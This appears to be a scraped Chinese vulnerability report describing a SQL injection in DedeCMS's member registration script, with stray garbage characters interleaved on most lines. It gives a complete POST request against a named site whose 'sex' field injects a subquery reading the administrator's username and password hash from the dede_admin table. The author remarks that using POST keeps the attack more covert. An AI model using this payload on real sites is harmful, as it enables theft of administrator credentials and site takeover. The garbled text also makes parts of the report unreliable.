漏洞类型: SQL注射漏洞0 T; K& M5 G, `) g
简要描述:
7 q" U' e6 V( S% T+ {& F ?, B6 J% ]9 e3 k! ~
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
0 S& p5 T9 g+ |6 O原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.& |8 I. P+ W) _& J4 n! j1 w
详细说明:跟这个漏洞
9 {5 x" B! R5 w 3 p% a2 g2 Z& e+ w r
WooYun: Dedecms SQL注射导致审核机制绕过漏洞2 _1 a) }- B' m
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.+ P) Q5 G4 i5 R9 g0 I0 E2 s! Q2 s
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
5 d" ]0 A, d- J* { L
$ c2 _ m. e3 E1 P+ s' Ewww.political-security.com/member/reg_new.php
0 \8 A: H5 N6 o V# K7 L
( q) T' }* _+ d3 K- @" ^' V" r! |POST! `7 X, f4 C: P. q( g
" d" Z; E) _+ W: O g$ O i
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
. w: d8 D. q X: b/ i9 q6 q8 ?; Tuserid=c4rp3nt3r&uname=c4rp3nt3r
& ]& h/ o; ^/ v; t7 \) @&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
; [" c! j9 q/ Z7 P&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
. @1 O+ A7 s# u) M(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');9 ?% F! @$ O! C0 e/ D
%00&vdcode=glos&agree= |